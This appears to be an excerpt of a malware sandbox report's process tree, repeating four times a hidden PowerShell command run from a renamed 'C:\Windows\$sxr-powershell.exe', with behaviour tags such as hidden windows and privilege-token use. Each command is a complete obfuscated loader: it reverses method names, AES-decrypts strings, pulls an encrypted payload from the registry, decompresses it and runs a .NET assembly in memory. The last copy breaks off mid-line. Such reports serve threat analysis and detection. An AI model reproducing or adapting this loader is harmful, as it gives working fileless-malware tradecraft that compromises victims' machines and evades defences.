                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1540
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3764
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:5076
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 